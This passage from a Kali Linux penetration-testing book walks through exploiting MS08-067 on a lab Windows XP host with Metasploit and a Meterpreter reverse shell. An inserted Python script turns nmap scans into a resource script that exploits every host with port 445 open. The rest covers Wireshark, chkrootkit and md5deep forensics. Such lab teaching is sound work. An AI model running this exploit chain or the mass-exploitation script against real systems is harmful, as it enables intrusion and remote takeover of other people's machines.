the Windows XP system with the IP 192.168.56.102. Note that this plain scan only tells us which
hosts are up and what state their ports are in; it does not identify the operating system. An OS
detection scan (nmap -O) or, as here, knowledge of our own lab tells us that the host runs
Windows XP, so our next task is to identify a remote exploit for Windows XP. Fortunately, there are
a few stable ones. Let us search the Metasploit repository for the netapi vulnerability:


msf > search netapi
[!] Database not connected or cache not built, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-26       great   Microsoft Server Service Relative Path Stack Corruption
Let us select the ms08_067_netapi exploit module, which is ranked as
great. To activate this module, pass the following command at the console:


msf > use exploit/windows/smb/ms08_067_netapi


This changes the console prompt to msf exploit(ms08_067_netapi) >, indicating that the exploit
module is loaded and ready to be configured.


Our next step is to pass the required parameter values to the exploit module.
The show options command lists the parameters and marks which ones are required.


Here the RHOST value needs to be set. RHOST is the remote host that we want to target:

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.102


Once the exploit module is configured, the next step is to select a PAYLOAD. Let us use the
Meterpreter reverse TCP payload, which makes the target connect back to us:


msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp


Once the Meterpreter payload is selected, we need to set its parameters. Run show options
again to view them. The one that must be set is LHOST, the IP of the attacking machine to
which the payload connects back (192.168.56.101 in this lab, as the reverse handler line in the
output below shows); LPORT defaults to 4444.


Now we are all set to launch the exploit. The exploit command sends the exploit
module to the target machine:


msf exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.56.101:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - Lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1039) at
2013-07-02 18:19:55 +0000





If the attack succeeds, the console prompt changes to meterpreter >, indicating that our
payload is running on the remote machine and we can now control it from our attacking
machine. Notice how easily Metasploit took over the remote target with a single exploit
module. The module works here because the lab target is an unpatched Windows XP SP2; a system
with the MS08-067 update applied is not affected. Metasploit is a very powerful tool for
performing penetration tests against remote targets. This was a quick introductory
tutorial on Metasploit.
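The scan-then-exploit sequence above, as an added Python example that is not part of the book or of Metasploit: it parses Nmap's grepable output (nmap -oG; the sample embedded here is constructed for the lab addresses in the text, not the scan shown on the page), picks the hosts with TCP 445 open, and writes a resource script that replays the use / set RHOST / set PAYLOAD / set LHOST / exploit steps for each of them, to be run with msfconsole -r attack.rc. The module and payload names are the ones used above; the file names, the port choice and the lab addresses are this example's assumptions.

```python
"""Added example, not from the book or the Metasploit project: turn an nmap
grepable scan into a Metasploit resource script that repeats the walkthrough's
steps (use, set RHOST, set PAYLOAD, set LHOST, exploit) for every host that
has TCP 445 open."""
import sys
from typing import Dict, List, Set, Tuple

# Constructed sample of `nmap -oG` output for the book's lab addresses;
# it is not the scan output shown on the page.
SAMPLE_GREPABLE = """\
# Nmap 6.25 scan initiated (constructed sample) as: nmap -p 139,445 -oG - 192.168.56.0/24
Host: 192.168.56.100 ()\tStatus: Up
Host: 192.168.56.100 ()\tPorts: 139/filtered/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 192.168.56.101 ()\tStatus: Up
Host: 192.168.56.101 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/closed/tcp//microsoft-ds///
Host: 192.168.56.102 ()\tStatus: Up
Host: 192.168.56.102 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
# Nmap done (constructed sample)
"""


def parse_grepable(text: str) -> Dict[str, Set[Tuple[int, str]]]:
    """Map each scanned host to its set of (tcp port, state) pairs.
    Grepable lines are tab-separated fields; the Ports field holds
    comma-separated entries of the form port/state/proto/owner/service/rpc/version/."""
    hosts: Dict[str, Set[Tuple[int, str]]] = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")
        ip = fields[0].split()[1]
        ports = hosts.setdefault(ip, set())
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                port, state, proto = entry.split("/")[:3]
                if proto == "tcp":
                    ports.add((int(port), state))
    return hosts


def hosts_with_open_port(hosts: Dict[str, Set[Tuple[int, str]]], port: int) -> List[str]:
    return sorted(ip for ip, ports in hosts.items() if (port, "open") in ports)


def build_resource_script(targets: List[str], lhost: str, lport: int = 4444) -> str:
    """Emit an msfconsole resource script. Each target gets its own LPORT so the
    background jobs started with `exploit -j` do not compete for one listener;
    `-z` keeps the console from dropping into the first session that opens."""
    if not targets:
        raise ValueError("no targets with the service open")
    lines = [
        "use exploit/windows/smb/ms08_067_netapi",  # RHOST as in the walkthrough
        "set PAYLOAD windows/meterpreter/reverse_tcp",
        f"set LHOST {lhost}",
    ]
    for i, target in enumerate(targets):
        lines += [f"set RHOST {target}", f"set LPORT {lport + i}", "exploit -j -z"]
    lines.append("sessions -l")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Usage: python3 gen_rc.py scan.gnmap 192.168.56.101 > attack.rc
    #        msfconsole -r attack.rc
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GREPABLE
    lhost = sys.argv[2] if len(sys.argv) > 2 else "192.168.56.101"
    targets = hosts_with_open_port(parse_grepable(text), 445)
    sys.stdout.write(build_resource_script(targets, lhost))
```

A port that shows as filtered, like 445 on 192.168.56.100 in the sample, is skipped: a firewall is dropping the probes, and the exploit could not reach the service either.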


Let us move on to the next section, where we will read about various forensics tools present in 
Kali Linux. 


Network forensics using Kali Linux


Network forensics involves capturing, analyzing, and reporting on network traffic and the related
evidence recovered from a computer system or digital storage media. Forensics involves a detailed
investigation of events along with gathering relevant information. Kali comes with a wide range of
tools that can assist in effective forensic analysis. Forensic analysis usually involves investigating
different aspects, which requires different tools. Unlike exploitation, which can be driven from a
single framework, forensics usually depends on multiple tools. Let us cover some of the major
forensic tools in detail here.


Network analysis with Wireshark 


Wireshark is an open source network packet analyzer tool similar to tcpdump that captures 
the data packets flowing over the wire (network) and presents them in an understandable 
form. Wireshark can be considered as a Swiss army knife as it can be used under different 
circumstances such as network troubleshooting, security operations, and learning protocol 
internals. This is one tool that does it all, and with ease. 


Some of the important benefits of working with Wireshark are as follows: 


+ Multiple protocol support
+ A user-friendly interface
+ Live traffic analysis
+ Open source


To begin working with Wireshark in Kali Linux, navigate to Applications | Kali Linux | Top 10 
security tools | Wireshark. 
Once the GUI is loaded, you have to select the interface you want to capture on.
The lower-left panel lists the available interfaces. Select an interface and click on
Start to begin. You will notice that the GUI starts showing the packets captured on the
selected interface.


[Screenshot: Wireshark capture window]

Filter: [                ] Expression...

No.  Time          Source             Destination        Protocol  Length  Info
45   70.071550000  CadmusCo_89:db:06  RealtekU_12:35:02  ARP       42      Who has 10.0.2.2? Tell 10.0.2.15
46   70.071791000  RealtekU_12:35:02  CadmusCo_89:db:06  ARP       60      10.0.2.2 is at 52:54:00:12:35:02

> Frame 1: 42 bytes on wire (336 bits), 42 bytes captured (336 bits) on interface 0
> Ethernet II, Src: CadmusCo_89:db:06 (08:00:27:89:db:06), Dst: Broadcast (ff:ff:ff:ff:ff:ff)
> Address Resolution Protocol (request)

0000  ff ff ff ff ff ff 08 00 27 89 db 06 08 06 00 01
0010  08 00 06 04 00 01 08 00 27 89 db 06 0a 00 02 0f
0020  00 00 00 00 00 00 0a 00 02 02





You will notice that the Wireshark GUI is divided into three distinct panels. The packet list panel
shows the captured packets, one per line, with source, destination, protocol, and a one-line summary
in the Info column. The packet details panel decodes the packet selected in the list layer by layer
(here Ethernet II and ARP). The packet bytes panel shows the raw bytes of the same packet as a hex
dump; the details panel is a decoding of exactly these bytes. The Filter box above the packet list
takes a display filter (for example, arp) to narrow the list to the traffic of interest.
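The relationship between the packet bytes panel and the details panel, as an added Python example that is not code from the book or from Wireshark: it decodes the 42-byte ARP request whose hex dump appears above into the same fields Wireshark shows, reproduces the Info column text, builds the matching reply, and flags an IP address that two different MACs claim across a capture, which is the ARP spoofing pattern a network forensics capture would reveal. The request bytes are the ones on the page; the reply and the spoofed reply are constructed for the example.

```python
"""Added example, not code from the book or the Wireshark project: a parser for
the Ethernet II + ARP frame shown in the packet bytes panel, a builder for the
matching reply, and a check for an IP address claimed by more than one MAC."""
import struct
from typing import Dict, List, Optional

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# The 42 bytes shown in the book's packet bytes panel, typed in from the dump.
REQUEST_FRAME = bytes.fromhex(
    "ff ff ff ff ff ff 08 00 27 89 db 06 08 06 00 01 "
    "08 00 06 04 00 01 08 00 27 89 db 06 0a 00 02 0f "
    "00 00 00 00 00 00 0a 00 02 02"
)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def ip_bytes(text: str) -> bytes:
    return bytes(int(part) for part in text.split("."))


def parse_arp_frame(frame: bytes) -> Optional[Dict[str, object]]:
    """Decode Ethernet II and, if the EtherType is ARP, the ARP body.
    Returns None for non-ARP frames; raises on truncated or non-Ethernet/IPv4 ARP."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    body = frame[14:]
    if len(body) < 28:
        raise ValueError("truncated ARP body")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", body[:8])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet/IPv4 ARP is handled")
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", body[8:28])
    return {"eth_dst": mac_str(dst), "eth_src": mac_str(src), "op": oper,
            "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def info_column(pkt: Dict[str, object]) -> str:
    """The text Wireshark puts in the Info column for an ARP packet."""
    if pkt["op"] == ARP_REQUEST:
        return f"Who has {pkt['tpa']}? Tell {pkt['spa']}"
    if pkt["op"] == ARP_REPLY:
        return f"{pkt['spa']} is at {pkt['sha']}"
    return f"ARP opcode {pkt['op']}"


def build_arp_frame(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Build a frame: requests are broadcast, replies go back to the requester.
    Padded to 60 bytes, the minimum Ethernet frame size (compare the 60-byte
    reply in the packet list above with the unpadded 42-byte request)."""
    eth_dst = "ff:ff:ff:ff:ff:ff" if op == ARP_REQUEST else tha
    header = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(sha), ETHERTYPE_ARP)
    body = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                       mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))
    frame = header + body
    return frame + b"\x00" * max(0, 60 - len(frame))


def arp_conflicts(frames: List[bytes]) -> Dict[str, List[str]]:
    """IP addresses claimed by more than one sender MAC across a capture."""
    claims: Dict[str, set] = {}
    for frame in frames:
        pkt = parse_arp_frame(frame)
        if pkt is not None:
            claims.setdefault(pkt["spa"], set()).add(pkt["sha"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


if __name__ == "__main__":
    pkt = parse_arp_frame(REQUEST_FRAME)
    print(pkt["eth_src"], "->", pkt["eth_dst"], "|", info_column(pkt))
```

The conflict check keys on the sender fields of every ARP packet, not only replies, because a forged gratuitous request poisons a cache just as well as a forged reply.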


Rootkit-scanning forensics with chkrootkit 


Rootkits are malicious programs that are designed to hide malicious processes from detection 
and allow continued, often remote, access to a computer system. Kali Linux provides a special 
rootkit forensics tool called chkrootkit. It can be launched by navigating to Kali Linux | 
Forensics | Digital anti-forensics | chkrootkit. 
Once the terminal is loaded, change the directory to /usr/sbin and launch chkrootkit
(/usr/sbin is already on root's PATH, so running chkrootkit from any directory works as well):


root@kali:~# cd /usr/sbin
root@kali:/usr/sbin# ./chkrootkit
Illegal number: /-trunk-686-pae
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected





Once chkrootkit is launched, it scans the system for known rootkit signatures and for
modified versions of common binaries. "not found" means the binary is not installed; only
"INFECTED" is a finding. The "Illegal number" line is chkrootkit's shell script complaining
about the format of the running kernel's version string, not a finding. chkrootkit is a very
handy tool to quickly identify suspicious programs installed on the system. Bear in mind that it
runs on the binaries and kernel of the machine it is checking, so a rootkit that hooks those can
hide from it; for a serious investigation, examine the disk from a trusted boot medium (Kali's
forensic boot mode) instead.


File analysis using md5deep


md5deep is an open source tool that computes hashes, or message digests, for any
number of files. It can also recurse through a directory structure to generate the signature
of each and every file inside the directory. Generating MD5 signatures of files helps forensic
analysts determine whether the content of a file has changed. The MD5 of the
original file is compared with the MD5 of the possibly modified file; if there is a mismatch,
the file has been modified. Note that MD5 is no longer collision resistant, so for integrity checks
against a deliberate attacker the same package also provides sha256deep and hashdeep, which work
the same way with stronger hash functions.
The use of md5deep is fairly simple. It can be launched from Applications | Kali Linux |
Forensics | Forensic Hashing Tools | md5deep. Run without arguments, it prints its usage:


md5deep version 4.2 by Jesse Kornblum and Simson Garfinkel.
$ md5deep [OPTION]... [FILES]...
See the man page or README.txt file or use -hh for the full list of options
-p <size> - piecewise mode. Files are broken into blocks for hashing
-r        - recursive mode. All subdirectories are traversed
-e        - show estimated time remaining for each file
-s        - silent mode. Suppress all error messages
-z        - display file size before hash
-m <file> - enables matching mode. See README/man page
-x <file> - enables negative matching mode. See README/man page
-M and -X are the same as -m and -x but also print hashes of each file
-w        - displays which known file generated a match
-n        - displays known hashes that did not match any input files
-a and -A add a single hash to the positive or negative matching set
-b        - prints only the bare name of files; all path information is omitted
-l        - print relative paths for filenames
-t        - print GMT timestamp (ctime)
-i/-I <size> - only process files smaller/larger than SIZE
-v        - display version number and exit
-d        - output in DFXML; -u - Escape Unicode; -W FILE - write to FILE
-j <num>  - use num threads (default 1)
-Z        - triage mode; -h - help; -hh - full help





To generate a baseline of file signatures for a directory, use the following command:
root@kali:~# md5deep -r /darklord > darklordmd5.sum

To check the directory against that baseline later, run md5deep in negative matching mode, giving it
the baseline file and the directory to hash:
root@kali:~# md5deep -r -x darklordmd5.sum /darklord


Negative matching prints every file whose hash is not in the baseline, that is, every file that has
been modified or added since the baseline was taken. Because matching is done on the hash alone, a
renamed file is not reported, and neither is a deleted one; hashdeep's audit mode (-a) reports both.
In this way, we can analyze file integrity to make sure whether any modifications have
been made or not.
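The two md5deep steps above (a recursive baseline, then a check against it), as an added Python example that is not code from the book or from the md5deep project: it hashes a tree the way md5deep -r does, writes and reads back md5deep's "hash  path" output format, and audits a later walk against the baseline by path, so that deleted files are reported alongside the modified and added ones that negative matching (-x) finds. The hash algorithm is selectable, so the same code does what sha256deep does. The directory tree it builds under a temporary directory, including the "trojaned" binary and the "backdoor" file, is constructed for the example.

```python
"""Added example, not code from the book or from the md5deep project: recursive
hashing into a baseline in md5deep's output format, then a path-keyed audit of
the tree against that baseline."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List


def hash_file(path: Path, algo: str = "md5", chunk: int = 1 << 16) -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    digest = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def hash_tree(root: Path, algo: str = "md5") -> Dict[str, str]:
    """md5deep -r: hash every regular file under root, keyed by relative path.
    Symlinks are skipped so the walk cannot be led outside the tree."""
    root = Path(root)
    result: Dict[str, str] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if not (Path(dirpath) / d).is_symlink())
        for name in sorted(filenames):
            path = Path(dirpath) / name
            if path.is_symlink() or not path.is_file():
                continue
            result[path.relative_to(root).as_posix()] = hash_file(path, algo)
    return result


def format_sums(hashes: Dict[str, str]) -> str:
    """md5deep's output format: '<hash>  <path>', one file per line."""
    return "".join(f"{h}  {p}\n" for p, h in sorted(hashes.items()))


def parse_sums(text: str) -> Dict[str, str]:
    """Read a baseline written by format_sums (or by md5deep itself)."""
    known: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, path = line.partition("  ")
        if not sep or not path:
            raise ValueError(f"malformed baseline line: {line!r}")
        known[path] = digest.lower()
    return known


def audit(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path. md5deep -x matches on hash alone, so it lists added
    and modified files but says nothing about files that have disappeared."""
    return {
        "unchanged": sorted(p for p in current if baseline.get(p) == current[p]),
        "modified": sorted(p for p in current if p in baseline and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "deleted": sorted(p for p in baseline if p not in current),
    }


def demo(algo: str = "md5") -> Dict[str, List[str]]:
    """Constructed scenario: baseline a small tree, tamper with it, audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "darklord"
        (root / "bin").mkdir(parents=True)
        (root / "bin" / "ls").write_bytes(b"original ls\n")
        (root / "bin" / "ps").write_bytes(b"original ps\n")
        (root / "etc.conf").write_bytes(b"setting=1\n")
        baseline = format_sums(hash_tree(root, algo))  # md5deep -r /darklord > darklordmd5.sum
        (root / "bin" / "ps").write_bytes(b"trojaned ps\n")  # a replaced binary
        (root / "bin" / "backdoor").write_bytes(b"evil\n")   # a new file
        (root / "etc.conf").unlink()                          # a deleted file
        return audit(parse_sums(baseline), hash_tree(root, algo))


if __name__ == "__main__":
    for bucket, paths in demo().items():
        print(f"{bucket:9s} {paths}")
```

Keep the baseline file on media the examined system cannot write to; a baseline stored on the same disk as the files it describes can be regenerated by whoever modified them.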
People and places you should get to know


If you need help with Kali Linux, here are some people and places that will prove invaluable. 


Official sites


The following are official sites that you should visit:


+ Homepage: http://www.kali.org
+ Manual and documentation: http://docs.kali.org
+ Blog: http://www.kali.org/blog/
+ Source code: http://git.kali.org/gitweb/


Articles and tutorials


The following are articles that you should read to gain more knowledge on Kali Linux:

+ BackTrack is reborn - Kali:
www.offensive-security.com/offsec/backtrack-reborn-kali-linux/
+ Easily assessing wireless networks with Kali Linux:
https://community.rapid7.com/community/infosec/blog/2013/05/22/easily-assessing-wireless-networks-with-kali-linux
+ Kali Linux cracks passwords on an enterprise level:
http://lifehacker.com/5990375/kali-linux-cracks-passwords-on-the-enterprise-level
+ Installing VMware Tools on Kali Linux:
http://www.drchaos.com/installing-vmware-tools-on-kali-linux/


Community

You can reach the Kali Linux community at:


+ Official mailing list: info@kali.org
+ Official forums: http://forums.kali.org
+ Unofficial forums: http://www.kalilinux.net
+ IRC: irc.freenode.net #kali-linux
Blogs


The following are a few blogs and video tutorials you should read through:


+ Learning security tips through interactive videos by Vivek Ramachandran:
http://www.securitytube.net
+ Metasploit Unleashed, a project by the founders of Kali:
http://www.offensive-security.com/metasploit-unleashed/Main_Page
+ Video tutorials on Kali by Cyber Arms:
http://cyberarms.wordpress.com/2013/07/01/video-training-kali-linux-assuring-security-by-penetration-testing/
+ Cyber attack management with Armitage: http://www.fastandeasyhacking.com/


Twitter


You can follow:


+ Kali Linux on Twitter: https://twitter.com/kalilinux
+ MalwareMustDie, NPO on Twitter: https://twitter.com/malwaremustdie
+ Follow Devon Kearns on Twitter: https://twitter.com/dookie2000ca
+ Follow Abhinav Singh on Twitter: https://twitter.com/abhinavbom
+ Follow Ken Soona on Twitter: https://twitter.com/attackvector#shamelessplug
About Packt Publishing


Packt, pronounced 'packed', published its first book "Mastering phpMyAdmin for Effective MySQL
Management" in April 2004 and subsequently continued to specialize in publishing highly focused
books on specific technologies and solutions.


Our books and publications share the experiences of your fellow IT professionals in adapting and 
customizing today's systems, applications, and frameworks. Our solution based books give you the 
knowledge and power to customize the software and technologies you're using to get the job done. 
Packt books are more specific and less general than the IT books you have seen in the past. Our 
unique business model allows us to bring you more focused information, giving you more of what 
you need to know, and less of what you don't. 


Packt is a modern, yet unique publishing company, which focuses on producing quality, cutting-edge
books for communities of developers, administrators, and newbies alike. For more information, please
visit our website: www.packtpub.com.


Writing for Packt 


We welcome all inquiries from people who are interested in authoring. Book proposals should be sent
to author@packtpub.com. If your book idea is still at an early stage and you would like to discuss
it first before writing a formal book proposal, contact us; one of our commissioning editors will get in
touch with you.


We're not just looking for published authors; if you have strong technical skills but no writing 
experience, our experienced editors can help you develop a writing career, or simply get some 
additional reward for your expertise. 
Web Penetration Testing with Kali Linux
ISBN: 978-1-78216-316-9 Paperback: 342 pages


A practical guide to implementing penetration testing strategies on websites, web applications,
and standard web protocols with Kali Linux


1. Learn key reconnaissance concepts needed as a penetration tester

2. Attack and exploit key features, authentication, and sessions on web applications

3. Learn how to protect systems, write reports, and sell web penetration testing services


Instant Penetration Testing: Setting Up a Test Lab How-to
ISBN: 978-1-84969-412-4 Paperback: 88 pages


Set up your own penetration testing lab using practical and precise recipes


1. Learn something new in an Instant! A short, fast, focused guide delivering immediate results.

2. A concise and clear explanation of penetration testing, and how you can benefit from it.

3. Understand the architectural underpinnings of your penetration test lab.


Please check www.PacktPub.com for information on our titles
Kali Linux Cookbook
ISBN: 978-1-78328-959-2 Paperback: 260 pages


Over 70 recipes to help you master Kali Linux for effective 
penetration security testing 


1. Recipes designed to educate you extensively on the 
penetration testing principles and Kali Linux tools 


2. Learn to use Kali Linux tools, such as Metasploit,
Wireshark, and many more, through in-depth and
structured instructions


3. Teaching you in an easy-to-follow style, full of 
examples, illustrations, and tips that will suit 
experts and novices alike 


Linux Utilities Cookbook 
ISBN: 978-1-78216-300-8 Paperback: 101 pages 


Over 70 recipes to help you accomplish a wide variety of 
tasks in Linux quickly and efficiently 


1. Use the command line like a pro
2. Pick a suitable desktop environment


3. Learn to use files and directories efficiently 


Please check www.PacktPub.com for information on our titles 


